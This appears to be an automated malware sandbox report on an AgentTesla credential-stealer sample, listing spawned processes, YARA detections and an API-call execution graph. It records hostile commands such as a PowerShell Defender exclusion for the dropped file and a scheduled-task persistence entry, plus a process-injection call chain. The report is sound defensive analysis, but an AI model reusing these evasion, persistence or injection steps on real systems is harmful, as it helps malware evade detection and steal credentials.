                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:4
                                                            Start time:20:39:08
                                                            Start date:12/02/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:5
                                                            Start time:20:39:08
                                                            Start date:12/02/2024
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lnYkIr.exe
                                                            Imagebase:0xeb0000
                                                            File size:433'152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:6
                                                            Start time:20:39:08
                                                            Start date:12/02/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:7
                                                            Start time:20:39:08
                                                            Start date:12/02/2024
                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lnYkIr" /XML "C:\Users\user\AppData\Local\Temp\tmp9C71.tmp
                                                            Imagebase:0x350000
                                                            File size:187'904 bytes
                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:8
                                                            Start time:20:39:08
                                                            Start date:12/02/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:9
                                                            Start time:20:39:09
                                                            Start date:12/02/2024
                                                            Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe
                                                            Imagebase:0xf00000
                                                            File size:743'424 bytes
                                                            MD5 hash:2D291BAEDB79EE55DAA67417103F0905
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.3368803671.00000000032AB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.3368803671.0000000003287000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.3368803671.0000000003261000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.3368803671.0000000003261000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.3365723059.0000000000437000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:false

                                                            Target ID:10
                                                            Start time:20:39:10
                                                            Start date:12/02/2024
                                                            Path:C:\Users\user\AppData\Roaming\lnYkIr.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\AppData\Roaming\lnYkIr.exe
                                                            Imagebase:0xe20000
                                                            File size:743'424 bytes
                                                            MD5 hash:2D291BAEDB79EE55DAA67417103F0905
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2187787442.000000000441F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.2187787442.000000000441F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Antivirus matches:
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 29%, ReversingLabs
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:11
                                                            Start time:20:39:11
                                                            Start date:12/02/2024
                                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                            Imagebase:0x7ff6ef0c0000
                                                            File size:496'640 bytes
                                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                            Has elevated privileges:true
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            Target ID:12
                                                            Start time:20:39:13
                                                            Start date:12/02/2024
                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lnYkIr" /XML "C:\Users\user\AppData\Local\Temp\tmpADC6.tmp
                                                            Imagebase:0x350000
                                                            File size:187'904 bytes
                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:13
                                                            Start time:20:39:13
                                                            Start date:12/02/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:14
                                                            Start time:20:39:13
                                                            Start date:12/02/2024
                                                            Path:C:\Users\user\AppData\Roaming\lnYkIr.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\AppData\Roaming\lnYkIr.exe
                                                            Imagebase:0x7c0000
                                                            File size:743'424 bytes
                                                            MD5 hash:2D291BAEDB79EE55DAA67417103F0905
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.3368762224.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.3368762224.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.3368762224.0000000002C37000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.3368762224.0000000002C5B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:false

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:11.5%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:9.4%
                                                              Total number of Nodes:331
                                                              Total number of Limit Nodes:17
                                                              execution_graph 38848 70ec9af 38849 70ec850 38848->38849 38854 70ef768 38848->38854 38859 70ef7d6 38848->38859 38865 70ef729 38848->38865 38870 70ef778 38848->38870 38855 70ef783 38854->38855 38875 70efaaf 38855->38875 38892 70efab0 38855->38892 38856 70ef7b6 38856->38849 38860 70ef764 38859->38860 38862 70ef7d9 38859->38862 38863 70efaaf 12 API calls 38860->38863 38864 70efab0 12 API calls 38860->38864 38861 70ef7b6 38861->38849 38862->38849 38863->38861 38864->38861 38866 70ef732 38865->38866 38868 70efaaf 12 API calls 38866->38868 38869 70efab0 12 API calls 38866->38869 38867 70ef7b6 38867->38849 38868->38867 38869->38867 38871 70ef783 38870->38871 38873 70efaaf 12 API calls 38871->38873 38874 70efab0 12 API calls 38871->38874 38872 70ef7b6 38872->38849 38873->38872 38874->38872 38876 70efac5 38875->38876 38889 70efad7 38876->38889 38909 b7f04f5 38876->38909 38917 b7f0359 38876->38917 38922 b7f02dc 38876->38922 38927 b7f027e 38876->38927 38932 b7f0040 38876->38932 38938 b7f0701 38876->38938 38943 b7f06c3 38876->38943 38948 b7f0784 38876->38948 38953 b7f0485 38876->38953 38957 b7f04c7 38876->38957 38965 b7f0007 38876->38965 38971 b7f03cc 38876->38971 38976 b7f03d2 38876->38976 38980 b7f05b5 38876->38980 38889->38856 38893 70efac5 38892->38893 38894 b7f027e 2 API calls 38893->38894 38895 b7f02dc 2 API calls 38893->38895 38896 b7f0359 2 API calls 38893->38896 38897 b7f04f5 4 API calls 38893->38897 38898 b7f05b5 2 API calls 38893->38898 38899 b7f03d2 2 API calls 38893->38899 38900 b7f03cc 2 API calls 38893->38900 38901 b7f0007 2 API calls 38893->38901 38902 b7f04c7 4 API calls 38893->38902 38903 b7f0485 2 API calls 38893->38903 38904 b7f0784 2 API calls 38893->38904 38905 b7f06c3 2 API calls 38893->38905 38906 70efad7 38893->38906 38907 b7f0701 2 API calls 38893->38907 38908 b7f0040 2 API calls 38893->38908 38894->38906 38895->38906 38896->38906 38897->38906 38898->38906 38899->38906 38900->38906 38901->38906 38902->38906 38903->38906 38904->38906 38905->38906 38906->38856 38907->38906 38908->38906 38910 b7f0502 38909->38910 38985 70ec008 38910->38985 38989 70ec010 38910->38989 38911 b7f0286 38912 b7f0298 38911->38912 38993 70ec1a8 38911->38993 38997 70ec1a1 38911->38997 38912->38889 38918 b7f036c 38917->38918 39001 70ebf58 38918->39001 39005 70ebf60 38918->39005 38919 b7f0399 38919->38889 38923 b7f02fa 38922->38923 38924 b7f0399 38923->38924 38925 70ebf58 ResumeThread 38923->38925 38926 70ebf60 ResumeThread 38923->38926 38924->38889 38925->38924 38926->38924 38928 b7f0286 38927->38928 38929 b7f0298 38928->38929 38930 70ec1a8 WriteProcessMemory 38928->38930 38931 70ec1a1 WriteProcessMemory 38928->38931 38929->38889 38930->38928 38931->38928 38934 b7f0073 38932->38934 38933 b7f0c60 38933->38889 38934->38933 39009 70ec424 38934->39009 39013 70ec430 38934->39013 38939 b7f0b67 38938->38939 39017 70ec298 38939->39017 39021 70ec291 38939->39021 38940 b7f0b89 38944 b7f05cc 38943->38944 38945 b7f05ed 38944->38945 38946 70ec1a8 WriteProcessMemory 38944->38946 38947 70ec1a1 WriteProcessMemory 38944->38947 38945->38889 38946->38945 38947->38945 38951 70ec1a8 WriteProcessMemory 38948->38951 38952 70ec1a1 WriteProcessMemory 38948->38952 38949 b7f0298 38949->38889 38950 b7f0286 38950->38948 38950->38949 38951->38950 38952->38950 39025 70ec0e8 38953->39025 39029 70ec0e0 38953->39029 38954 b7f04a3 38958 b7f04d4 38957->38958 38963 70ec008 Wow64SetThreadContext 38958->38963 38964 70ec010 Wow64SetThreadContext 38958->38964 38959 b7f0286 38960 b7f0298 38959->38960 38961 70ec1a8 WriteProcessMemory 38959->38961 38962 70ec1a1 WriteProcessMemory 38959->38962 38960->38889 38961->38959 38962->38959 38963->38959 38964->38959 38967 b7f0020 38965->38967 38966 b7f0c60 38966->38889 38967->38966 38969 70ec424 CreateProcessA 38967->38969 38970 70ec430 CreateProcessA 38967->38970 38968 b7f025e 38968->38889 38969->38968 38970->38968 38972 b7f0b2d 38971->38972 38974 70ec008 Wow64SetThreadContext 38972->38974 38975 70ec010 Wow64SetThreadContext 38972->38975 38973 b7f0b48 38974->38973 38975->38973 38978 70ec1a8 WriteProcessMemory 38976->38978 38979 70ec1a1 WriteProcessMemory 38976->38979 38977 b7f0400 38977->38889 38978->38977 38979->38977 38981 b7f05bb 38980->38981 38983 70ec1a8 WriteProcessMemory 38981->38983 38984 70ec1a1 WriteProcessMemory 38981->38984 38982 b7f05ed 38982->38889 38983->38982 38984->38982 38986 70ec010 Wow64SetThreadContext 38985->38986 38988 70ec09d 38986->38988 38988->38911 38990 70ec055 Wow64SetThreadContext 38989->38990 38992 70ec09d 38990->38992 38992->38911 38994 70ec1f0 WriteProcessMemory 38993->38994 38996 70ec247 38994->38996 38996->38911 38998 70ec1a8 WriteProcessMemory 38997->38998 39000 70ec247 38998->39000 39000->38911 39002 70ebf60 ResumeThread 39001->39002 39004 70ebfd1 39002->39004 39004->38919 39006 70ebfa0 ResumeThread 39005->39006 39008 70ebfd1 39006->39008 39008->38919 39010 70ec430 CreateProcessA 39009->39010 39012 70ec67b 39010->39012 39014 70ec4b9 CreateProcessA 39013->39014 39016 70ec67b 39014->39016 39018 70ec2e3 ReadProcessMemory 39017->39018 39020 70ec327 39018->39020 39020->38940 39022 70ec298 ReadProcessMemory 39021->39022 39024 70ec327 39022->39024 39024->38940 39026 70ec128 VirtualAllocEx 39025->39026 39028 70ec165 39026->39028 39028->38954 39030 70ec0e8 VirtualAllocEx 39029->39030 39032 70ec165 39030->39032 39032->38954 38634 52b79e8 38635 52b7a13 38634->38635 38658 52b76e4 38635->38658 38640 52b76f4 CreateWindowExW 38641 52b7ab0 38640->38641 38642 52b76f4 CreateWindowExW 38641->38642 38643 52b7b0a 38642->38643 38644 52b76f4 CreateWindowExW 38643->38644 38645 52b7b64 38644->38645 38646 52b76f4 CreateWindowExW 38645->38646 38647 52b7b82 38646->38647 38648 52b76e4 CreateWindowExW 38647->38648 38650 52b7bbe 38648->38650 38649 52b76e4 CreateWindowExW 38651 52b7d16 38649->38651 38650->38649 38657 52b7dca 38650->38657 38652 52b76e4 CreateWindowExW 38651->38652 38653 52b7d52 38652->38653 38654 52b76e4 CreateWindowExW 38653->38654 38655 52b7dac 38654->38655 38656 52b76e4 CreateWindowExW 38655->38656 38656->38657 38659 52b76ef 38658->38659 38666 52b78b4 38659->38666 38661 52b7a74 38662 52b76f4 38661->38662 38663 52b76ff 38662->38663 38726 52b97b8 38663->38726 38665 52b7a92 38665->38640 38667 52b78bf 38666->38667 38671 2bf9428 38667->38671 38675 2bf7ab0 38667->38675 38668 52b963c 38668->38661 38673 2bf942d 38671->38673 38672 2bf9729 38672->38668 38673->38672 38679 2bfde90 38673->38679 38676 2bf7abb 38675->38676 38677 2bf9729 38676->38677 38678 2bfde90 CreateWindowExW 38676->38678 38677->38668 38678->38677 38680 2bfdeb1 38679->38680 38681 2bfded5 38680->38681 38683 2bfe040 38680->38683 38681->38672 38684 2bfe04d 38683->38684 38685 2bfe087 38684->38685 38687 2bfd978 38684->38687 38685->38681 38688 2bfd983 38687->38688 38689 2bfe998 38688->38689 38691 2bfdaa4 38688->38691 38692 2bfdaaf 38691->38692 38693 2bf7ab0 CreateWindowExW 38692->38693 38694 2bfea07 38693->38694 38698 52b0890 38694->38698 38704 52b0878 38694->38704 38695 2bfea41 38695->38689 38700 52b08c1 38698->38700 38701 52b09c1 38698->38701 38699 52b08cd 38699->38695 38700->38699 38709 52b1ae0 38700->38709 38714 52b1af0 38700->38714 38701->38695 38705 52b088a 38704->38705 38706 52b08cd 38705->38706 38707 52b1ae0 CreateWindowExW 38705->38707 38708 52b1af0 CreateWindowExW 38705->38708 38706->38695 38707->38706 38708->38706 38710 52b1af0 38709->38710 38711 52b1bca 38710->38711 38719 52b2991 38710->38719 38723 52b29c0 38710->38723 38715 52b1b1b 38714->38715 38716 52b1bca 38715->38716 38717 52b2991 CreateWindowExW 38715->38717 38718 52b29c0 CreateWindowExW 38715->38718 38717->38716 38718->38716 38720 52b29c0 38719->38720 38721 52b17d0 CreateWindowExW 38720->38721 38722 52b29f5 38721->38722 38722->38711 38724 52b17d0 CreateWindowExW 38723->38724 38725 52b29f5 38724->38725 38725->38711 38727 52b97c3 38726->38727 38728 2bf9428 CreateWindowExW 38727->38728 38729 52b9cf2 38727->38729 38730 2bf7ab0 CreateWindowExW 38727->38730 38728->38729 38729->38665 38730->38729 38799 2bf4668 38800 2bf4674 38799->38800 38804 2bf47b0 38799->38804 38809 2bf43b8 38800->38809 38802 2bf468f 38805 2bf47d5 38804->38805 38816 2bf48b1 38805->38816 38820 2bf48c0 38805->38820 38810 2bf43c3 38809->38810 38828 2bf5d2c 38810->38828 38813 2bf7bdb 38815 2bf7eec 38813->38815 38832 2bf7a50 38813->38832 38814 2bf7fbd 38814->38802 38815->38802 38817 2bf48c0 38816->38817 38818 2bf49c4 38817->38818 38824 2bf4518 38817->38824 38822 2bf48e7 38820->38822 38821 2bf49c4 38822->38821 38823 2bf4518 CreateActCtxA 38822->38823 38823->38821 38825 2bf5d50 CreateActCtxA 38824->38825 38827 2bf5e13 38825->38827 38829 2bf5d37 38828->38829 38830 2bf7a50 CreateWindowExW 38829->38830 38831 2bf7fbd 38830->38831 38831->38813 38833 2bf7a5b 38832->38833 38836 2bf7a80 38833->38836 38835 2bf809a 38835->38814 38837 2bf7a8b 38836->38837 38838 2bf7ab0 CreateWindowExW 38837->38838 38839 2bf818d 38838->38839 38839->38835 38840 2bfc168 38841 2bfc17c 38840->38841 38842 2bfc1a1 38841->38842 38844 2bfb910 38841->38844 38845 2bfc348 LoadLibraryExW 38844->38845 38847 2bfc3c1 38845->38847 38847->38842 39033 2bfe158 39034 2bfe19e 39033->39034 39037 2bfe338 39034->39037 39040 2bfda40 39037->39040 39041 2bfe3a0 DuplicateHandle 39040->39041 39042 2bfe28b 39041->39042 39043 b7f0e88 39044 b7f0eae 39043->39044 39047 b7f1013 39043->39047 39044->39047 39048 b7f1108 PostMessageW 39044->39048 39050 b7f1101 39044->39050 39049 b7f1174 39048->39049 39049->39044 39051 b7f1108 PostMessageW 39050->39051 39052 b7f1174 39051->39052 39052->39044 38731 116d01c 38732 116d034 38731->38732 38733 116d08e 38732->38733 38738 52b3928 38732->38738 38747 52b2bc8 38732->38747 38751 52b2bb8 38732->38751 38756 52b17fc 38732->38756 38740 52b3938 38738->38740 38739 52b3999 38781 52b1924 38739->38781 38740->38739 38742 52b3989 38740->38742 38765 52b3b8c 38742->38765 38771 52b3ac0 38742->38771 38776 52b3ab1 38742->38776 38743 52b3997 38748 52b2bee 38747->38748 38749 52b17fc CallWindowProcW 38748->38749 38750 52b2c0f 38749->38750 38750->38733 38752 52b2b80 38751->38752 38753 52b2bc6 38751->38753 38752->38752 38754 52b17fc CallWindowProcW 38753->38754 38755 52b2c0f 38754->38755 38755->38733 38757 52b1807 38756->38757 38758 52b3999 38757->38758 38760 52b3989 38757->38760 38759 52b1924 CallWindowProcW 38758->38759 38761 52b3997 38759->38761 38762 52b3b8c CallWindowProcW 38760->38762 38763 52b3ab1 CallWindowProcW 38760->38763 38764 52b3ac0 CallWindowProcW 38760->38764 38762->38761 38763->38761 38764->38761 38766 52b3b4a 38765->38766 38767 52b3b9a 38765->38767 38785 52b3b68 38766->38785 38789 52b3b78 38766->38789 38768 52b3b60 38768->38743 38773 52b3ad4 38771->38773 38772 52b3b60 38772->38743 38774 52b3b68 CallWindowProcW 38773->38774 38775 52b3b78 CallWindowProcW 38773->38775 38774->38772 38775->38772 38778 52b3ad4 38776->38778 38777 52b3b60 38777->38743 38779 52b3b68 CallWindowProcW 38778->38779 38780 52b3b78 CallWindowProcW 38778->38780 38779->38777 38780->38777 38782 52b192f 38781->38782 38783 52b507a CallWindowProcW 38782->38783 38784 52b5029 38782->38784 38783->38784 38784->38743 38786 52b3b78 38785->38786 38787 52b3b89 38786->38787 38792 52b4fb1 38786->38792 38787->38768 38790 52b3b89 38789->38790 38791 52b4fb1 CallWindowProcW 38789->38791 38790->38768 38791->38790 38793 52b1924 CallWindowProcW 38792->38793 38794 52b4fca 38793->38794 38794->38787 38795 52b9ca0 38796 52b9cb0 38795->38796 38797 52b97b8 CreateWindowExW 38796->38797 38798 52b9cbf 38797->38798 39053 2bfc0c0 39054 2bfc108 GetModuleHandleW 39053->39054 39055 2bfc102 39053->39055 39056 2bfc135 39054->39056 39055->39054

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 294 52b79e8-52b7c08 call 52b76d4 call 52b76e4 call 52b76f4 * 2 call 52b7704 * 2 call 52b76f4 call 52b7704 * 2 call 52b76f4 * 2 call 52b7704 call 52b76e4 352 52b7c0e-52b7c14 294->352 353 52b7d03-52b7e03 call 52b76e4 call 52b7714 call 52b76e4 call 52b7724 call 52b7704 call 52b76e4 * 2 294->353 354 52b7c17-52b7c78 352->354 360 52b9350-52b93e7 call 52b7884 353->360 404 52b7e09-52b7e62 353->404 359 52b7c7e-52b7c8f 354->359 354->360 359->360 361 52b7c95-52b7cb4 359->361 361->360 364 52b7cba-52b7ccc 361->364 366 52b7cce-52b7cd5 364->366 367 52b7cd6-52b7ce4 364->367 366->367 367->360 369 52b7cea-52b7cfd 367->369 369->353 369->354 410 52b7e7a-52b7e8c 404->410 411 52b7e64-52b7e6a 404->411 410->360 415 52b7e92-52b7eab 410->415 412 52b7e6e-52b7e70 411->412 413 52b7e6c 411->413 412->410 413->410 415->360 417 52b7eb1-52b7ef7 415->417 417->360 422 52b7efd-52b7f10 417->422 422->360 424 52b7f16-52b7f4d 422->424 428 52b7f56-52b934f call 52b7734 call 52b7744 call 52b7754 call 52b7764 call 52b7774 call 52b7784 call 52b7794 call 52b7744 call 52b7754 call 52b7764 call 52b77a4 call 52b77b4 call 52b77c4 call 52b7744 call 52b7754 call 52b77d4 call 52b7764 call 52b77a4 call 52b7744 call 52b7754 call 52b77d4 call 52b7764 call 52b77a4 call 52b7744 call 52b7754 call 52b7764 call 52b77a4 call 52b7744 call 52b7754 call 52b7764 call 52b77a4 call 52b7744 call 52b7754 call 52b77d4 call 52b7764 call 52b77a4 call 52b7744 call 52b7754 call 52b7764 call 52b77a4 call 52b7744 call 52b7754 call 52b7764 call 52b77a4 call 52b7744 call 52b7754 call 52b77d4 call 52b7764 call 52b77a4 call 52b7744 call 52b7754 call 52b77d4 call 52b7764 call 52b77a4 call 52b7744 call 52b7754 call 52b7764 call 52b77a4 call 52b7744 call 52b7754 call 52b7764 call 52b77a4 call 52b77b4 call 52b77c4 call 52b7744 call 52b7754 call 52b7764 call 52b77a4 call 52b77b4 call 52b77c4 call 52b77e4 call 52b77f4 call 52b7744 call 52b7754 call 52b7764 call 52b77a4 call 52b7744 call 52b7754 call 52b7764 call 52b77a4 call 52b77b4 call 52b77c4 call 52b7804 call 52b7744 call 52b7754 call 52b7764 call 52b77a4 call 52b7744 call 52b7754 call 52b7764 call 52b77a4 call 52b77b4 call 52b77c4 call 52b7744 call 52b7754 call 52b7764 call 52b77a4 call 52b77b4 call 52b77c4 call 52b7814 call 52b7824 call 52b7834 call 52b7844 * 19 call 52b7854 call 52b7864 call 52b7754 call 52b7874 424->428
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2147454333.00000000052B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_52b0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: #$'$0$0$0$0$0$4'jq$>$@$@$@$@$K$K$L$L$O$i$o
                                                              • API String ID: 0-2568456975
                                                              • Opcode ID: 03e662f1c3cd1c5cf1c3d2723bcbd5df7b13312a3c06f72d52b5c0d3b99f0e2e
                                                              • Instruction ID: 065969afd3cd0a30399ed6910f8b54f0de7a5a698b09c44bba91542d9639b79b
                                                              • Opcode Fuzzy Hash: 03e662f1c3cd1c5cf1c3d2723bcbd5df7b13312a3c06f72d52b5c0d3b99f0e2e
                                                              • Instruction Fuzzy Hash: 06F22634A20315CFDB15EF24C894AD9B7B2FF89300F6442E9D8096B365DB75AA85CF90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 734 52b79d8-52b7a61 call 52b76d4 743 52b7a6b-52b7a6f call 52b76e4 734->743 745 52b7a74-52b7abb call 52b76f4 * 2 743->745 755 52b7ac5-52b7ac9 call 52b7704 745->755 757 52b7ace-52b7c08 call 52b7704 call 52b76f4 call 52b7704 * 2 call 52b76f4 * 2 call 52b7704 call 52b76e4 755->757 793 52b7c0e-52b7c14 757->793 794 52b7d03-52b7d21 call 52b76e4 757->794 795 52b7c17-52b7c78 793->795 809 52b7d2b-52b7d2f call 52b7714 794->809 800 52b7c7e-52b7c8f 795->800 801 52b9350-52b93e7 call 52b7884 795->801 800->801 802 52b7c95-52b7cb4 800->802 802->801 805 52b7cba-52b7ccc 802->805 807 52b7cce-52b7cd5 805->807 808 52b7cd6-52b7ce4 805->808 807->808 808->801 810 52b7cea-52b7cfd 808->810 813 52b7d34-52b7dca call 52b76e4 call 52b7724 call 52b7704 call 52b76e4 * 2 809->813 810->794 810->795 841 52b7dd5 813->841 842 52b7de1-52b7e03 841->842 842->801 845 52b7e09-52b7e43 842->845 849 52b7e4a-52b7e58 845->849 850 52b7e60-52b7e62 849->850 851 52b7e7a-52b7e82 850->851 852 52b7e64-52b7e6a 850->852 855 52b7e88-52b7e8c 851->855 853 52b7e6e-52b7e70 852->853 854 52b7e6c 852->854 853->851 854->851 855->801 856 52b7e92-52b7eab 855->856 856->801 858 52b7eb1-52b7ef7 856->858 858->801 863 52b7efd-52b7f10 858->863 863->801 865 52b7f16-52b7f3a 863->865 868 52b7f44-52b7f4d 865->868 869 52b7f56-52b934f call 52b7734 call 52b7744 call 52b7754 call 52b7764 call 52b7774 call 52b7784 call 52b7794 call 52b7744 call 52b7754 call 52b7764 call 52b77a4 call 52b77b4 call 52b77c4 call 52b7744 call 52b7754 call 52b77d4 call 52b7764 call 52b77a4 call 52b7744 call 52b7754 call 52b77d4 call 52b7764 call 52b77a4 call 52b7744 call 52b7754 call 52b7764 call 52b77a4 call 52b7744 call 52b7754 call 52b7764 call 52b77a4 call 52b7744 call 52b7754 call 52b77d4 call 52b7764 call 52b77a4 call 52b7744 call 52b7754 call 52b7764 call 52b77a4 call 52b7744 call 52b7754 call 52b7764 call 52b77a4 call 52b7744 call 52b7754 call 52b77d4 call 52b7764 call 52b77a4 call 52b7744 call 52b7754 call 52b77d4 call 52b7764 call 52b77a4 call 52b7744 call 52b7754 call 52b7764 call 52b77a4 call 52b7744 call 52b7754 call 52b7764 call 52b77a4 call 52b77b4 call 52b77c4 call 52b7744 call 52b7754 call 52b7764 call 52b77a4 call 52b77b4 call 52b77c4 call 52b77e4 call 52b77f4 call 52b7744 call 52b7754 call 52b7764 call 52b77a4 call 52b7744 call 52b7754 call 52b7764 call 52b77a4 call 52b77b4 call 52b77c4 call 52b7804 call 52b7744 call 52b7754 call 52b7764 call 52b77a4 call 52b7744 call 52b7754 call 52b7764 call 52b77a4 call 52b77b4 call 52b77c4 call 52b7744 call 52b7754 call 52b7764 call 52b77a4 call 52b77b4 call 52b77c4 call 52b7814 call 52b7824 call 52b7834 call 52b7844 * 19 call 52b7854 call 52b7864 call 52b7754 call 52b7874 868->869
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2147454333.00000000052B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_52b0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: #$'$0$0$0$0$0$>$@$@$@$@$K$K$L$L$O$i$o
                                                              • API String ID: 0-2994534767
                                                              • Opcode ID: 21509a6673a7c1f72ac3c78d4dafa5a9bafa34cffe56b7a7b296a48095a8df24
                                                              • Instruction ID: 22ebe85868ae99dd75d2d908bfde4773e27c4c274c6100ba07b112974c106efd
                                                              • Opcode Fuzzy Hash: 21509a6673a7c1f72ac3c78d4dafa5a9bafa34cffe56b7a7b296a48095a8df24
                                                              • Instruction Fuzzy Hash: 8EF21634A10215CFDB15EF24C894AD9B7B2FF8A300F6442F9D8096B365DB75AA85CF90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2149731358.000000000B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B7F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_b7f0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
